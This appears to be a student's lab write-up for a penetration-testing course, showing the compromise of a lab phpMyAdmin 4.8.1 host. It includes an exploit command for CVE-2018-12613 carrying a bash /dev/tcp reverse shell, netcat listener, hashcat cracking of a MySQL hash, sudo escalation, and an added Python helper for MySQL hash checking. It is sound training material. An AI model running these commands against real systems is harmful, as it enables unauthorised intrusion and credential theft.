🛠️ SEC-335 Tech Journal – Lab 10.2: Nancurunír - Snowboundport37/champlain GitHub Wiki

🧙‍♂️ Project Theme

Target: nancurunir.shire.org
Pentester: Andrei

🧪 Technical Process Summary

🔍 Reconnaissance

  • Performed initial scan using Nmap:
    nmap -sV -sC -oA nancurunir 10.0.5.28

[Screenshot 2025-04-08 120914]

  • Discovered phpMyAdmin 4.8.1 accessible at /phpmyadmin.

🚪 Foothold

  • Found valid login credentials:

    • Username: gandalf
    • Password: shallnotpass
  • Used Exploit-DB 50457 to exploit CVE-2018-12613:

    python3 pma_rce.py 10.0.5.28 80 /phpmyadmin gandalf shallnotpass \
      "bash -c 'exec bash -i &>/dev/tcp/10.0.17.45/4444 <&1'"
  • Listener on Kali:

    nc -lvnp 4444
  • Successfully received shell as www-data.

[Screenshot 2025-04-08 120812]

📈 Privilege Escalation

  • Found a MySQL password hash for root:

    *2B72EB4F3B82A23BA998F7F76675B83FE9FE8DDC8
  • Cracked hash using hashcat:

    hashcat -m 300 hash.txt /usr/share/wordlists/rockyou.txt --force

    • Cracked password: gandalfthewhite

[Screenshot 2025-04-08 120652]

  • Switched to user gandalf:

    su gandalf
    Password: gandalfthewhite
  • Upgraded to full TTY shell:

    python3 -c 'import pty; pty.spawn("/bin/bash")'
  • Escalated to root:

    sudo -S su
    Password: gandalfthewhite

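As an added example (not part of the lab write-up), the scheme behind the hash cracked above: mysql_native_password stores `*` + HEX(SHA1(SHA1(password))), hashcat's mode 300 wants only the 40 hex characters without the leading `*`, and a single candidate can be verified offline when auditing a dump for reuse of an already-known password. All sample values are constructed and the function names are my own.

```python
import hashlib
import re

# mysql_native_password stores '*' + HEX(SHA1(SHA1(password))): 41 chars total.
# (Helper names below are my own, not the lab's or hashcat's.)
MYSQL_HASH_RE = re.compile(r"^\*[0-9A-Fa-f]{40}$")


def mysql_native_hash(password: str) -> str:
    """Hash `password` the way MySQL's PASSWORD()/mysql_native_password does."""
    inner = hashlib.sha1(password.encode("utf-8")).digest()  # raw 20-byte SHA1
    outer = hashlib.sha1(inner).hexdigest()                   # SHA1 over the raw digest
    return "*" + outer.upper()


def is_valid_mysql_hash(value: str) -> bool:
    """True only for the exact shape MySQL stores and hashcat -m 300 understands."""
    return bool(MYSQL_HASH_RE.match(value))


def to_hashcat_m300(value: str) -> str:
    """Turn a stored hash into a hash.txt line for hashcat mode 300.

    Mode 300 takes the 40 hex characters only; the leading '*' copied from
    mysql.user must be stripped or hashcat rejects the line.
    """
    if not is_valid_mysql_hash(value):
        raise ValueError(f"not a mysql_native_password hash: {value!r}")
    return value[1:].lower()


def candidate_matches(stored_hash: str, candidate: str) -> bool:
    """Offline check of one candidate password against a stored hash.

    This is the check behind auditing a dump for reuse of an already-known
    password (the root-hash / user-password reuse seen in this lab).
    """
    return is_valid_mysql_hash(stored_hash) and mysql_native_hash(candidate) == stored_hash


if __name__ == "__main__":
    # Constructed sample: a throwaway password, hashed locally.
    sample = mysql_native_hash("correct horse battery staple")
    print(sample)                                    # '*' + 40 uppercase hex
    print(to_hashcat_m300(sample))                   # line to write into hash.txt
    print(candidate_matches(sample, "not-the-password"))  # False
```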
🏁 Flags

  • User Flag:

    cat /home/gandalf/user-flag.txt
    82745644-c7f3-4250-acba-aa453abb2249
  • Root Flag:

    cat /root/root-flag.txt
    22815793-a31c-42e5-ab46-a42241152c26

💭 Reflection

🧠 Challenges Faced

  • Reverse shell wouldn’t initially connect due to quoting issues in the Python script.
  • Could not locate flags at first using cat; resolved using find.
  • Initially thought phpMyAdmin was off-limits, which added confusion.
  • Shell lacked a TTY, which blocked sudo until fixed with Python pty.spawn().

💡 Lessons Learned

  • Learned how to weaponize CVE-2018-12613 for authenticated RCE.
  • Gained experience cracking MySQL native password hashes with Hashcat.
  • Understood how misconfigured sudo access and password reuse lead to full system compromise.
  • Practiced chain exploitation: foothold → lateral movement → root.

✅ Summary

This lab was a complete end-to-end compromise, from web login to full root. By chaining a known phpMyAdmin vulnerability with password hash cracking and a sudo misconfiguration, I was able to achieve total control over the Nancurunír target system. Every step reinforced real-world offensive security techniques.